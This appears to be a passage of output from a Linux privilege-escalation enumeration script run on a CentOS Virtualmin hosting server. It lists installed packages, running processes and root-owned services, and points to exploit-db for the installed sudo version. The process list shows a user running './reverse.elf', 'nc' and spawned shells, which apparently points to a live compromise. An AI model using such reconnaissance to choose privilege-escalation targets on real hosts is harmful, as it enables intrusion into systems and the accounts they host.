  3020. poppler-data-0.4.6-3.el7.noarch
  3021. popt-1.13-16.el7.x86_64
  3022. portreserve-0.0.5-11.el7.x86_64
  3023. postfix-2.10.1-6.el7.x86_64
  3024. postgresql-9.2.18-1.el7.x86_64
  3025. postgresql-libs-9.2.18-1.el7.x86_64
  3026. postgresql-server-9.2.18-1.el7.x86_64
  3027. ppp-2.4.5-33.el7.x86_64
  3028. procmail-3.22-35.el7.x86_64
  3029. procmail-wrapper-1.0-1.vm.x86_64
  3030. procps-ng-3.3.10-10.el7.x86_64
  3031. proftpd-1.3.5e-2.el7.x86_64
  3032. psmisc-22.20-11.el7.x86_64
  3033. pth-2.0.7-23.el7.x86_64
  3034. pygobject3-base-3.14.0-3.el7.x86_64
  3035. pygpgme-0.3-9.el7.x86_64
  3036. pyliblzma-0.5.3-11.el7.x86_64
  3037. pyparsing-1.5.6-9.el7.noarch
  3038. python-2.7.5-48.el7.x86_64
  3039. python-backports-1.0-8.el7.x86_64
  3040. python-backports-ssl_match_hostname-3.4.0.2-4.el7.noarch
  3041. python-configobj-4.7.2-7.el7.noarch
  3042. python-decorator-3.4.0-3.el7.noarch
  3043. python-dns-1.12.0-2.20150617git465785f.el7.noarch
  3044. python-firewall-0.4.3.2-8.1.el7_3.3.noarch
  3045. python-iniparse-0.4-9.el7.noarch
  3046. python-libs-2.7.5-48.el7.x86_64
  3047. python-perf-3.10.0-514.26.2.el7.x86_64
  3048. python-pycurl-7.19.0-19.el7.x86_64
  3049. python-pyudev-0.15-7.el7_2.1.noarch
  3050. python-setuptools-0.9.8-4.el7.noarch
  3051. python-slip-0.4.0-2.el7.noarch
  3052. python-slip-dbus-0.4.0-2.el7.noarch
  3053. python-urlgrabber-3.10-8.el7.noarch
  3054. pyxattr-0.5.1-5.el7.x86_64
  3055. qrencode-libs-3.4.1-3.el7.x86_64
  3056. quota-4.01-14.el7.x86_64
  3057. quota-nls-4.01-14.el7.noarch
  3058. readline-6.2-9.el7.x86_64
  3059. rest-0.7.92-5.el7.x86_64
  3060. rootfiles-8.1-11.el7.noarch
  3061. rpcbind-0.2.0-38.el7_3.1.x86_64
  3062. rpm-4.11.3-21.el7.x86_64
  3063. rpm-build-libs-4.11.3-21.el7.x86_64
  3064. rpm-libs-4.11.3-21.el7.x86_64
  3065. rpm-python-4.11.3-21.el7.x86_64
  3066. rsyslog-7.4.7-16.el7.x86_64
  3067. ruby-2.0.0.648-29.el7.x86_64
  3068. ruby-devel-2.0.0.648-29.el7.x86_64
  3069. ruby-irb-2.0.0.648-29.el7.noarch
  3070. ruby-libs-2.0.0.648-29.el7.x86_64
  3071. rubygem-bigdecimal-1.2.0-29.el7.x86_64
  3072. rubygem-io-console-0.4.2-29.el7.x86_64
  3073. rubygem-json-1.7.7-29.el7.x86_64
  3074. rubygem-psych-2.0.0-29.el7.x86_64
  3075. rubygem-rdoc-4.0.0-29.el7.noarch
  3076. rubygems-2.0.14.1-29.el7.noarch
  3077. scponly-4.8-18.el7.x86_64
  3078. sed-4.2.2-5.el7.x86_64
  3079. selinux-policy-3.13.1-102.el7_3.16.noarch
  3080. selinux-policy-targeted-3.13.1-102.el7_3.16.noarch
  3081. setup-2.8.71-7.el7.noarch
  3082. shadow-utils-4.1.5.1-24.el7.x86_64
  3083. shared-mime-info-1.1-9.el7.x86_64
  3084. slang-2.2.4-11.el7.x86_64
  3085. snappy-1.1.0-3.el7.x86_64
  3086. spamassassin-3.4.0-2.el7.x86_64
  3087. sqlite-3.7.17-8.el7.x86_64
  3088. subversion-1.7.14-10.el7.x86_64
  3089. subversion-libs-1.7.14-10.el7.x86_64
  3090. sudo-1.8.6p7-23.el7_3.x86_64
  3091. systemd-219-30.el7_3.9.x86_64
  3092. systemd-libs-219-30.el7_3.9.x86_64
  3093. systemd-sysv-219-30.el7_3.9.x86_64
  3094. systemtap-sdt-devel-3.0-7.el7.x86_64
  3095. sysvinit-tools-2.88-14.dsf.el7.x86_64
  3096. t1lib-5.1.2-14.el7.x86_64
  3097. tar-1.26-31.el7.x86_64
  3098. tcp_wrappers-7.6-77.el7.x86_64
  3099. tcp_wrappers-libs-7.6-77.el7.x86_64
  3100. teamd-1.25-4.el7.x86_64
  3101. trousers-0.3.13-1.el7.x86_64
  3102. tuned-2.7.1-3.el7_3.2.noarch
  3103. tzdata-2017b-1.el7.noarch
  3104. unixODBC-2.3.1-11.el7.x86_64
  3105. unzip-6.0-16.el7.x86_64
  3106. urw-fonts-2.4-16.el7.noarch
  3107. usermin-1.720-1.noarch
  3108. ust-virtual-server-theme-6.9-1.noarch
  3109. ustr-1.0.4-16.el7.x86_64
  3110. util-linux-2.23.2-33.el7_3.2.x86_64
  3111. vim-minimal-7.4.160-1.el7_3.1.x86_64
  3112. virt-what-1.13-8.el7.x86_64
  3113. virtualmin-base-5.0-4.rh.noarch
  3114. virtualmin-release-1.0-5.gpl.rhel.noarch
  3115. wbm-php-pear-1.6-1.noarch
  3116. wbm-ruby-gems-1.4-1.noarch
  3117. wbm-security-updates-4.5-1.noarch
  3118. wbm-virtual-server-5.99.gpl-1.noarch
  3119. wbm-virtualmin-awstats-5.1-1.noarch
  3120. wbm-virtualmin-dav-3.8-1.noarch
  3121. wbm-virtualmin-git-1.7-1.noarch
  3122. wbm-virtualmin-htpasswd-2.6-1.noarch
  3123. wbm-virtualmin-init-2.5-1.noarch
  3124. wbm-virtualmin-mailman-6.3-1.noarch
  3125. wbm-virtualmin-registrar-2.4-1.noarch
  3126. wbm-virtualmin-sqlite-1.4-1.noarch
  3127. wbm-virtualmin-svn-5.1-1.noarch
  3128. wbt-virtual-server-mobile-2.5-1.noarch
  3129. wbt-virtual-server-theme-9.3-1.noarch
  3130. webalizer-2.23_08-6.el7.x86_64
  3131. webmin-1.850-1.noarch
  3132. wget-1.14-13.el7.x86_64
  3133. which-2.20-7.el7.x86_64
  3134. wpa_supplicant-2.0-21.el7_3.x86_64
  3135. xfsprogs-4.5.0-10.el7_3.x86_64
  3136. xorg-x11-font-utils-7.5-20.el7.x86_64
  3137. xz-5.2.2-1.el7.x86_64
  3138. xz-libs-5.2.2-1.el7.x86_64
  3139. yum-3.4.3-150.el7.centos.noarch
  3140. yum-metadata-parser-1.1.4-10.el7.x86_64
  3141. yum-plugin-fastestmirror-1.1.31-40.el7.noarch
  3142. zip-3.0-11.el7.x86_64
  3143. zlib-1.2.7-17.el7.x86_64
  3144. zlib-devel-1.2.7-17.el7.x86_64
  3145.  
  3146. [+] Current processes
  3147. USER PID START TIME COMMAND
  3148. root 1 Apr01 150:20 /usr/lib/systemd/systemd
  3149. root 2 Apr01 0:11 [kthreadd]
  3150. root 3 Apr01 3:09 [ksoftirqd/0]
  3151. root 7 Apr01 2:17 [migration/0]
  3152. root 8 Apr01 0:00 [rcu_bh]
  3153. root 9 Apr01 250:48 [rcu_sched]
  3154. root 10 Apr01 2:25 [watchdog/0]
  3155. root 11 Apr01 2:22 [watchdog/1]
  3156. root 12 Apr01 2:24 [migration/1]
  3157. root 13 Apr01 10:43 [ksoftirqd/1]
  3158. root 15 Apr01 0:00 [kworker/1:0H]
  3159. root 16 Apr01 2:39 [watchdog/2]
  3160. root 17 Apr01 2:17 [migration/2]
  3161. root 18 Apr01 2:20 [ksoftirqd/2]
  3162. root 20 Apr01 0:00 [kworker/2:0H]
  3163. root 21 Apr01 2:13 [watchdog/3]
  3164. root 22 Apr01 3:06 [migration/3]
  3165. root 23 Apr01 6:25 [ksoftirqd/3]
  3166. root 27 Apr01 0:00 [kdevtmpfs]
  3167. root 28 Apr01 0:00 [netns]
  3168. root 29 Apr01 0:11 [khungtaskd]
  3169. root 30 Apr01 0:00 [writeback]
  3170. root 31 Apr01 0:00 [kintegrityd]
  3171. root 32 Apr01 0:00 [bioset]
  3172. root 33 Apr01 0:00 [kblockd]
  3173. root 34 Apr01 0:00 [md]
  3174. root 43 Apr01 118:29 [kswapd0]
  3175. root 44 Apr01 0:00 [ksmd]
  3176. root 45 Apr01 39:05 [khugepaged]
  3177. root 46 Apr01 0:00 [fsnotify_mark]
  3178. root 47 Apr01 0:00 [crypto]
  3179. root 55 Apr01 0:00 [kthrotld]
  3180. root 57 Apr01 0:00 [kmpath_rdacd]
  3181. root 58 Apr01 0:00 [kpsmoused]
  3182. root 60 Apr01 0:00 [ipv6_addrconf]
  3183. root 79 Apr01 0:00 [deferwq]
  3184. root 113 Apr01 2:24 [kauditd]
  3185. root 288 Apr01 0:00 [ata_sff]
  3186. root 291 Apr01 0:00 [scsi_eh_0]
  3187. root 292 Apr01 0:00 [scsi_tmf_0]
  3188. root 293 Apr01 0:00 [scsi_eh_1]
  3189. root 294 Apr01 0:00 [scsi_tmf_1]
  3190. root 297 Apr01 0:00 [mpt_poll_0]
  3191. root 298 Apr01 0:00 [mpt/0]
  3192. root 308 Apr01 0:00 [scsi_eh_2]
  3193. root 309 Apr01 0:00 [scsi_tmf_2]
  3194. root 312 Apr01 0:00 [ttm_swap]
  3195. root 395 Apr01 0:00 [kdmflush]
  3196. root 396 Apr01 0:00 [bioset]
  3197. root 403 Apr01 0:00 [kdmflush]
  3198. root 404 Apr01 0:00 [bioset]
  3199. root 421 Apr01 0:00 [xfsalloc]
  3200. root 422 Apr01 0:00 [xfs_mru_cache]
  3201. root 423 Apr01 0:00 [xfs-buf/dm-1]
  3202. root 424 Apr01 0:00 [xfs-data/dm-1]
  3203. root 425 Apr01 0:00 [xfs-conv/dm-1]
  3204. root 426 Apr01 0:00 [xfs-cil/dm-1]
  3205. root 427 Apr01 0:00 [xfs-reclaim/dm-]
  3206. root 428 Apr01 0:00 [xfs-log/dm-1]
  3207. root 429 Apr01 0:00 [xfs-eofblocks/d]
  3208. root 430 Apr01 85:39 [xfsaild/dm-1]
  3209. root 506 Apr01 94:55 /usr/lib/systemd/systemd-journald
  3210. root 598 Apr01 1:08 [kworker/1:1H]
  3211. root 603 Apr01 0:00 [xfs-buf/sda1]
  3212. root 604 Apr01 0:00 [xfs-data/sda1]
  3213. root 605 Apr01 0:00 [xfs-conv/sda1]
  3214. root 606 Apr01 0:00 [xfs-cil/sda1]
  3215. root 607 Apr01 0:00 [xfs-reclaim/sda]
  3216. root 608 Apr01 0:00 [xfs-log/sda1]
  3217. root 609 Apr01 0:00 [xfs-eofblocks/s]
  3218. root 610 Apr01 0:00 [xfsaild/sda1]
  3219. root 616 Apr01 6:57 [jbd2/sdb1-8]
  3220. root 617 Apr01 0:00 [ext4-rsv-conver]
  3221. root 633 Apr01 8:48 /sbin/auditd
  3222. root 657 Apr01 69:01 /usr/lib/systemd/systemd-logind
  3223. avahi 659 Apr01 8:45 avahi-daemon:
  3224. dbus 662 Apr01 129:30 /bin/dbus-daemon
  3225. avahi 665 Apr01 0:00 avahi-daemon:
  3226. root 667 Apr01 0:00 /usr/sbin/saslauthd
  3227. root 668 Apr01 0:00 /usr/sbin/saslauthd
  3228. root 669 Apr01 0:00 /usr/sbin/saslauthd
  3229. root 670 Apr01 0:00 /usr/sbin/saslauthd
  3230. root 671 Apr01 0:00 /usr/sbin/saslauthd
  3231. root 687 Apr01 0:00 /sbin/agetty
  3232. root 784 Apr01 32:00 /usr/sbin/NetworkManager
  3233. root 827 Apr01 215:12 /usr/sbin/vmtoolsd
  3234. root 883 Apr01 0:00 /usr/lib/vmware-vgauth/VGAuthService
  3235. root 946 Apr01 117:45 /usr/lib/vmware-caf/pme/bin/ManagementAgentHost
  3236. root 997 Apr01 0:26 [kworker/2:1H]
  3237. root 1183 Apr01 35:28 /usr/sbin/rsyslogd
  3238. root 1284 Apr01 0:00 /usr/sbin/dovecot
  3239. postgres 1327 Apr01 132:17 /usr/bin/postgres
  3240. dovecot 1339 Apr01 0:00 dovecot/anvil
  3241. root 1341 Apr01 0:00 dovecot/log
  3242. postgres 1419 Apr01 0:00 postgres:
  3243. postgres 1461 Apr01 0:26 postgres:
  3244. postgres 1463 Apr01 3:20 postgres:
  3245. postgres 1465 Apr01 3:19 postgres:
  3246. postgres 1466 Apr01 88:52 postgres:
  3247. postgres 1467 Apr01 136:22 postgres:
  3248. mailman 1703 Apr01 0:00 /usr/bin/python
  3249. mailman 1709 Apr01 42:35 /usr/bin/python
  3250. mailman 1710 Apr01 43:59 /usr/bin/python
  3251. mailman 1717 Apr01 42:48 /usr/bin/python
  3252. mailman 1718 Apr01 42:10 /usr/bin/python
  3253. mailman 1724 Apr01 42:18 /usr/bin/python
  3254. mailman 1725 Apr01 44:08 /usr/bin/python
  3255. mailman 1726 Apr01 42:25 /usr/bin/python
  3256. mailman 1729 Apr01 0:25 /usr/bin/python
  3257. root 1855 Apr01 1:41 /usr/libexec/postfix/master
  3258. postfix 1881 Apr01 0:45 qmgr
  3259. root 3170 19:50 0:00 [kworker/1:0]
  3260. enfyfis 4562 13:50 6:34 /bin/php-cgi
  3261. enfyfis 4678 13:53 1:18 /bin/php-cgi
  3262. esingen+ 6403 Sep08 0:02 php
  3263. esingen+ 6405 Sep08 0:00 rm
  3264. root 7432 Nov17 0:00 [kworker/3:0H]
  3265. postfix 8100 20:56 0:00 pickup
  3266. root 8264 21:00 0:00 /usr/sbin/CROND
  3267. root 8269 21:00 0:00 /bin/bash
  3268. root 8271 21:00 0:00 sleep
  3269. root 9004 14:52 0:00 [kworker/0:0H]
  3270. root 9071 21:08 0:00 [kworker/u8:0]
  3271. imeymat 9334 14:56 0:44 /bin/php-cgi
  3272. imeymat 9357 14:56 0:43 /bin/php-cgi
  3273. root 9931 21:20 0:01 [kworker/3:0]
  3274. program+ 10469 21:26 0:00 /bin/sh
  3275. program+ 10471 21:27 0:00 python
  3276. program+ 10472 21:27 0:00 /bin/bash
  3277. program+ 10856 21:30 0:00 /bin/sh
  3278. program+ 10865 21:30 0:00 python
  3279. program+ 10866 21:30 0:00 /bin/bash
  3280. program+ 10881 21:31 0:00 ./reverse.elf
  3281. program+ 10890 21:31 0:00 /bin/sh
  3282. program+ 10892 21:31 0:00 python
  3283. program+ 10893 21:31 0:00 /bin/bash
  3284. economi+ 11248 Nov19 0:31 /bin/php-cgi
  3285. root 11254 21:36 0:00 [kworker/0:1H]
  3286. apache 11414 Nov19 0:11 /usr/sbin/httpd
  3287. default 11459 Nov19 0:04 /bin/php-cgi
  3288. program+ 11713 21:43 0:00 nc
  3289. economi+ 13219 Nov19 0:32 /bin/php-cgi
  3290. indess 13476 08:37 1:57 /bin/php-cgi
  3291. indess 13486 08:37 2:01 /bin/php-cgi
  3292. indess 13512 08:39 2:02 /bin/php-cgi
  3293. root 13686 Jul10 26:57 /usr/bin/perl
  3294. root 13725 Jul10 3:14 /usr/sbin/crond
  3295. root 13777 Jul10 0:00 /usr/lib/systemd/systemd-udevd
  3296. caiv 13904 02:01 0:01 /bin/php-cgi
  3297. root 14519 21:55 0:00 [kworker/2:0]
  3298. root 15247 22:05 0:00 [kworker/0:1]
  3299. root 15438 09:01 0:00 [kworker/3:2H]
  3300. ccsocia+ 15463 22:05 0:21 /bin/php-cgi
  3301. ccsocia+ 15467 22:05 0:05 /bin/php-cgi
  3302. root 15688 22:10 0:00 [kworker/u8:1]
  3303. root 15717 22:10 0:00 [kworker/0:0]
  3304. masingi+ 15920 02:02 0:01 /bin/php-cgi
  3305. apache 15940 22:12 0:00 /usr/sbin/httpd
  3306. apache 15952 22:12 0:00 /usr/sbin/httpd
  3307. apache 15958 22:12 0:00 /usr/sbin/httpd
  3308. program+ 15970 22:12 0:02 /bin/php-cgi
  3309. program+ 15983 22:13 0:02 /bin/php-cgi
  3310. root 16017 22:15 0:00 [kworker/3:1]
  3311. root 16173 22:15 0:00 [kworker/2:2]
  3312. apache 16300 22:15 0:00 /usr/sbin/httpd
  3313. apache 16302 22:15 0:00 /usr/sbin/httpd
  3314. root 16310 22:15 0:00 [kworker/1:1]
  3315. epsalge+ 16317 22:15 0:24 /bin/php-cgi
  3316. epsalge+ 16320 22:15 0:12 /bin/php-cgi
  3317. apache 16352 22:15 0:00 /usr/sbin/httpd
  3318. apache 16354 22:15 0:00 /usr/sbin/httpd
  3319. apache 16368 22:15 0:00 /usr/sbin/httpd
  3320. program+ 16432 22:17 0:01 /bin/php-cgi
  3321. root 16520 22:20 0:00 [kworker/0:2]
  3322. root 16559 22:20 0:00 [kworker/3:2]
  3323. root 16709 22:20 0:00 [kworker/1:2]
  3324. apache 16715 22:21 0:00 /usr/sbin/httpd
  3325. apache 16717 22:21 0:00 /usr/sbin/httpd
  3326. program+ 16778 22:22 0:00 /bin/sh
  3327. epsalge+ 16794 22:23 0:01 /bin/php-cgi
  3328. ciencias 16874 09:24 18:29 /bin/php-cgi
  3329. root 16951 Jul10 3:46 /usr/bin/perl
  3330. root 16993 Jul10 0:00 /usr/sbin/lvmetad
  3331. ciencias 17130 09:25 19:33 /bin/php-cgi
  3332. ciencias 17131 09:25 18:25 /bin/php-cgi
  3333. named 17168 Jul10 2:15 /usr/sbin/named
  3334. apache 17181 22:23 0:00 /usr/sbin/httpd
  3335. apache 17183 22:23 0:00 /usr/sbin/httpd
  3336. apache 17184 22:23 0:00 /usr/sbin/httpd
  3337. program+ 17187 22:24 0:00 python
  3338. polkitd 17279 Jul10 24:21 /usr/lib/polkit-1/polkitd
  3339. root 17317 Jul10 23:03 /usr/bin/python
  3340. root 17393 Jul10 18:31 /usr/bin/python
  3341. program+ 17550 22:24 0:00 /bin/sh
  3342. nobody 17551 Jul10 4:31 proftpd:
  3343. program+ 17552 22:24 0:00 ps
  3344. program+ 17553 22:24 0:00 awk
  3345. root 17570 Jul10 20:51 /usr/sbin/irqbalance
  3346. gradosi+ 17812 Nov19 0:07 /bin/php-cgi
  3347. gradosi+ 17815 Nov19 0:06 /bin/php-cgi
  3348. epsalge+ 18903 09:46 0:20 /bin/php-cgi
  3349. epsalge+ 21029 10:16 0:12 /bin/php-cgi
  3350. master 23413 Nov19 4:21 /bin/php-cgi
  3351. iuila 23652 10:53 0:17 /bin/php-cgi
  3352. iuila 23659 10:53 0:19 /bin/php-cgi
  3353. iuila 23660 10:53 0:10 /bin/php-cgi
  3354. zabbix 24484 Jul10 0:00 zabbix_agentd
  3355. zabbix 24486 Jul10 48:20 zabbix_agentd:
  3356. zabbix 24487 Jul10 34:06 zabbix_agentd:
  3357. zabbix 24488 Jul10 34:10 zabbix_agentd:
  3358. zabbix 24489 Jul10 34:18 zabbix_agentd:
  3359. zabbix 24490 Jul10 33:59 zabbix_agentd:
  3360. zabbix 24491 Jul10 33:51 zabbix_agentd:
  3361. master 26882 Nov19 4:41 /bin/php-cgi
  3362. root 27667 Oct27 0:00 /usr/sbin/sshd
  3363. mysql 27785 Oct27 0:00 /bin/sh
  3364. mysql 28086 Oct27 205:44 /usr/libexec/mysqld
  3365. root 28228 Oct27 10:06 /usr/sbin/httpd
  3366. imeymat 30637 Nov19 0:02 /bin/php-cgi
  3367.  
  3368. [+] Apache Version and Modules
  3369. Server version: Apache/2.4.6 (CentOS)
  3370. Server built: Jul 6 2017 19:50:55
  3371. Compiled in modules:
  3372. core.c
  3373. mod_so.c
  3374. http_core.c
  3375.  
  3376. [+] Apache Config File
  3377.  
  3378. [+] Sudo Version (Check out http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=sudo)
  3379. Sudo version 1.8.6p7
  3380. Sudoers policy plugin version 1.8.6p7
  3381. Sudoers file grammar version 42
  3382. Sudoers I/O plugin version 1.8.6p7
  3383.  
  3384. [*] IDENTIFYING PROCESSES AND PACKAGES RUNNING AS ROOT OR OTHER SUPERUSER...
  3385.  
  3386. root 403 Apr01 0:00 [kdmflush]
  3387. root 309 Apr01 0:00 [scsi_tmf_2]
  3388. root 17317 Jul10 23:03 /usr/bin/python
  3389. Possible Related Packages:
  3390. dbus-python-1.1.1-9.el7.x86_64
  3391. libselinux-python-2.5-6.el7.x86_64
  3392. newt-python-0.52.15-4.el7.x86_64
  3393. python-2.7.5-48.el7.x86_64
  3394. python-backports-1.0-8.el7.x86_64
  3395. python-backports-ssl_match_hostname-3.4.0.2-4.el7.noarch
  3396. python-configobj-4.7.2-7.el7.noarch
  3397. python-decorator-3.4.0-3.el7.noarch
  3398. python-dns-1.12.0-2.20150617git465785f.el7.noarch
  3399. python-firewall-0.4.3.2-8.1.el7_3.3.noarch
  3400. python-iniparse-0.4-9.el7.noarch
  3401. python-libs-2.7.5-48.el7.x86_64
  3402. python-perf-3.10.0-514.26.2.el7.x86_64
  3403. python-pycurl-7.19.0-19.el7.x86_64
  3404. python-pyudev-0.15-7.el7_2.1.noarch
  3405. python-setuptools-0.9.8-4.el7.noarch
  3406. python-slip-0.4.0-2.el7.noarch
  3407. python-slip-dbus-0.4.0-2.el7.noarch
  3408. python-urlgrabber-3.10-8.el7.noarch
  3409. rpm-python-4.11.3-21.el7.x86_64
  3410. root 11 Apr01 2:22 [watchdog/1]
  3411. root 1341 Apr01 0:00 dovecot/log
  3412. Possible Related Packages:
  3413. centos-logos-70.0.6-3.el7.centos.noarch
  3414. logrotate-3.8.6-12.el7.x86_64
  3415. perl-Sys-Syslog-0.33-3.el7.x86_64
  3416. rsyslog-7.4.7-16.el7.x86_64
  3417. root 16520 22:20 0:00 [kworker/0:2]
  3418. root 617 Apr01 0:00 [ext4-rsv-conver]
  3419. root 671 Apr01 0:00 /usr/sbin/saslauthd
  3420. root 16017 22:15 0:00 [kworker/3:1]
  3421. root 421 Apr01 0:00 [xfsalloc]
  3422. root 12 Apr01 2:24 [migration/1]
  3423. root 21 Apr01 2:13 [watchdog/3]
  3424. root 55 Apr01 0:00 [kthrotld]
  3425. root 16993 Jul10 0:00 /usr/sbin/lvmetad
  3426. root 60 Apr01 0:00 [ipv6_addrconf]
  3427. root 3 Apr01 3:09 [ksoftirqd/0]
  3428. root 598 Apr01 1:08 [kworker/1:1H]
  3429. root 293 Apr01 0:00 [scsi_eh_1]
  3430. root 34 Apr01 0:00 [md]
  3431. root 294 Apr01 0:00 [scsi_tmf_1]
  3432. root 606 Apr01 0:00 [xfs-cil/sda1]
  3433. root 8 Apr01 0:00 [rcu_bh]
  3434. root 827 Apr01 215:12 /usr/sbin/vmtoolsd
  3435. root 609 Apr01 0:00 [xfs-eofblocks/s]
  3436. root 997 Apr01 0:26 [kworker/2:1H]
  3437. root 7432 Nov17 0:00 [kworker/3:0H]
  3438. root 667 Apr01 0:00 /usr/sbin/saslauthd
  3439. root 657 Apr01 69:01 /usr/lib/systemd/systemd-logind
  3440. root 687 Apr01 0:00 /sbin/agetty
  3441. root 15 Apr01 0:00 [kworker/1:0H]
  3442. root 423 Apr01 0:00 [xfs-buf/dm-1]
  3443. root 784 Apr01 32:00 /usr/sbin/NetworkManager
  3444. Possible Related Packages:
  3445. NetworkManager-1.4.0-20.el7_3.x86_64
  3446. NetworkManager-glib-1.4.0-20.el7_3.x86_64
  3447. NetworkManager-libnm-1.4.0-20.el7_3.x86_64
  3448. NetworkManager-tui-1.4.0-20.el7_3.x86_64
  3449. root 15717 22:10 0:00 [kworker/0:0]
  3450. root 28 Apr01 0:00 [netns]
  3451. root 607 Apr01 0:00 [xfs-reclaim/sda]
  3452. root 8269 21:00 0:00 /bin/bash
  3453. Possible Related Packages:
  3454. bash-4.2.46-21.el7_3.x86_64
  3455. root 15438 09:01 0:00 [kworker/3:2H]
  3456. root 13686 Jul10 26:57 /usr/bin/perl
  3457. Possible Related Packages:
  3458. mod_perl-2.0.10-2.el7.x86_64
  3459. perl-5.16.3-291.el7.x86_64
  3460. perl-Archive-Tar-1.92-2.el7.noarch
  3461. perl-BSD-Resource-1.29.07-1.el7.x86_64
  3462. perl-Business-ISBN-2.06-2.el7.noarch
  3463. perl-Business-ISBN-Data-20120719.001-2.el7.noarch
  3464. perl-CGI-3.63-4.el7.noarch
  3465. perl-Carp-1.26-244.el7.noarch
  3466. perl-Compress-Raw-Bzip2-2.061-3.el7.x86_64
  3467. perl-Compress-Raw-Zlib-2.061-4.el7.x86_64
  3468. perl-Crypt-OpenSSL-Bignum-0.04-18.el7.x86_64
  3469. perl-Crypt-OpenSSL-RSA-0.28-7.el7.x86_64
  3470. perl-Crypt-OpenSSL-Random-0.04-21.el7.x86_64
  3471. perl-Crypt-SSLeay-0.64-5.el7.x86_64
  3472. perl-DBD-MySQL-4.023-5.el7.x86_64
  3473. perl-DBD-Pg-2.19.3-4.el7.x86_64
  3474. perl-DBI-1.627-4.el7.x86_64
  3475. perl-DB_File-1.830-6.el7.x86_64
  3476. perl-Data-Dumper-2.145-3.el7.x86_64
  3477. perl-Digest-1.17-245.el7.noarch
  3478. perl-Digest-HMAC-1.03-5.el7.noarch
  3479. perl-Digest-MD5-2.52-3.el7.x86_64
  3480. perl-Digest-SHA-5.85-3.el7.x86_64
  3481. perl-Encode-2.51-7.el7.x86_64
  3482. perl-Encode-Detect-1.01-13.el7.x86_64
  3483. perl-Encode-Locale-1.03-5.el7.noarch
  3484. perl-Error-0.17020-2.el7.noarch
  3485. perl-Exporter-5.68-3.el7.noarch
  3486. perl-ExtUtils-Install-1.58-291.el7.noarch
  3487. perl-ExtUtils-MakeMaker-6.68-3.el7.noarch
  3488. perl-ExtUtils-Manifest-1.61-244.el7.noarch
  3489. perl-ExtUtils-ParseXS-3.18-2.el7.noarch
  3490. perl-FCGI-0.74-8.el7.x86_64
  3491. perl-File-Listing-6.04-7.el7.noarch
  3492. perl-File-Path-2.09-2.el7.noarch
  3493. perl-File-Temp-0.23.01-3.el7.noarch
  3494. perl-Filter-1.49-3.el7.x86_64
  3495. perl-Geo-IP-1.43-3.el7.x86_64
  3496. perl-Getopt-Long-2.40-2.el7.noarch
  3497. perl-HTML-Parser-3.71-4.el7.x86_64
  3498. perl-HTML-Tagset-3.20-15.el7.noarch
  3499. perl-HTTP-Cookies-6.01-5.el7.noarch
  3500. perl-HTTP-Daemon-6.01-5.el7.noarch
  3501. perl-HTTP-Date-6.02-8.el7.noarch
  3502. perl-HTTP-Message-6.06-6.el7.noarch
  3503. perl-HTTP-Negotiate-6.01-5.el7.noarch
  3504. perl-HTTP-Tiny-0.033-3.el7.noarch
  3505. perl-IO-Compress-2.061-2.el7.noarch
  3506. perl-IO-HTML-1.00-2.el7.noarch
  3507. perl-IO-Socket-INET6-2.69-5.el7.noarch
  3508. perl-IO-Socket-IP-0.21-4.el7.noarch
  3509. perl-IO-Socket-SSL-1.94-5.el7.noarch
  3510. perl-IO-Tty-1.10-11.el7.x86_64
  3511. perl-IO-Zlib-1.10-291.el7.noarch
  3512. perl-LWP-MediaTypes-6.02-2.el7.noarch
  3513. perl-Linux-Pid-0.04-18.el7.x86_64
  3514. perl-Mail-DKIM-0.39-8.el7.noarch
  3515. perl-Mail-SPF-2.8.0-4.el7.noarch
  3516. perl-MailTools-2.12-2.el7.noarch
  3517. perl-Net-DNS-0.72-6.el7.x86_64
  3518. perl-Net-Daemon-0.48-5.el7.noarch
  3519. perl-Net-HTTP-6.06-2.el7.noarch
  3520. perl-Net-IP-1.26-4.el7.noarch
  3521. perl-Net-LibIDN-0.12-15.el7.x86_64
  3522. perl-Net-SMTP-SSL-1.01-13.el7.noarch
  3523. perl-Net-SSLeay-1.55-4.el7.x86_64
  3524. perl-NetAddr-IP-4.069-3.el7.x86_64
  3525. perl-Package-Constants-0.02-291.el7.noarch
  3526. perl-PathTools-3.40-5.el7.x86_64
  3527. perl-PlRPC-0.2020-14.el7.noarch
  3528. perl-Pod-Escapes-1.04-291.el7.noarch
  3529. perl-Pod-Perldoc-3.20-4.el7.noarch
  3530. perl-Pod-Simple-3.28-4.el7.noarch
  3531. perl-Pod-Usage-1.63-3.el7.noarch
  3532. perl-Scalar-List-Utils-1.27-248.el7.x86_64
  3533. perl-Socket-2.010-4.el7.x86_64
  3534. perl-Socket6-0.23-15.el7.x86_64
  3535. perl-Storable-2.45-3.el7.x86_64
  3536. perl-Switch-2.16-7.el7.noarch
  3537. perl-Sys-Syslog-0.33-3.el7.x86_64
  3538. perl-Test-Harness-3.28-3.el7.noarch
  3539. perl-Text-ParseWords-3.29-4.el7.noarch
  3540. perl-Time-HiRes-1.9725-3.el7.x86_64
  3541. perl-Time-Local-1.2300-2.el7.noarch
  3542. perl-TimeDate-2.30-2.el7.noarch
  3543. perl-URI-1.60-9.el7.noarch
  3544. perl-WWW-RobotRules-6.02-5.el7.noarch
  3545. perl-XML-NamespaceSupport-1.11-10.el7.noarch
  3546. perl-XML-Parser-2.41-10.el7.x86_64
  3547. perl-XML-SAX-0.99-9.el7.noarch
  3548. perl-XML-SAX-Base-1.08-7.el7.noarch
  3549. perl-XML-Simple-2.20-5.el7.noarch
  3550. perl-constant-1.27-2.el7.noarch
  3551. perl-devel-5.16.3-291.el7.x86_64
  3552. perl-libs-5.16.3-291.el7.x86_64
  3553. perl-libwww-perl-6.05-2.el7.noarch
  3554. perl-macros-5.16.3-291.el7.x86_64
  3555. perl-parent-0.225-244.el7.noarch
  3556. perl-podlators-2.5.1-3.el7.noarch
  3557. perl-threads-1.87-4.el7.x86_64
  3558. perl-threads-shared-1.43-6.el7.x86_64
  3559. perl-version-0.99.07-2.el7.x86_64
  3560. root 16 Apr01 2:39 [watchdog/2]
  3561. root 396 Apr01 0:00 [bioset]
  3562. root 28228 Oct27 10:06 /usr/sbin/httpd
  3563. Possible Related Packages:
  3564. httpd-2.4.6-45.el7.centos.4vm.x86_64
  3565. httpd-tools-2.4.6-45.el7.centos.4vm.x86_64
  3566. root 7 Apr01 2:17 [migration/0]
  3567. root 17393 Jul10 18:31 /usr/bin/python
  3568. Possible Related Packages:
  3569. dbus-python-1.1.1-9.el7.x86_64
  3570. libselinux-python-2.5-6.el7.x86_64
  3571. newt-python-0.52.15-4.el7.x86_64
  3572. python-2.7.5-48.el7.x86_64
  3573. python-backports-1.0-8.el7.x86_64
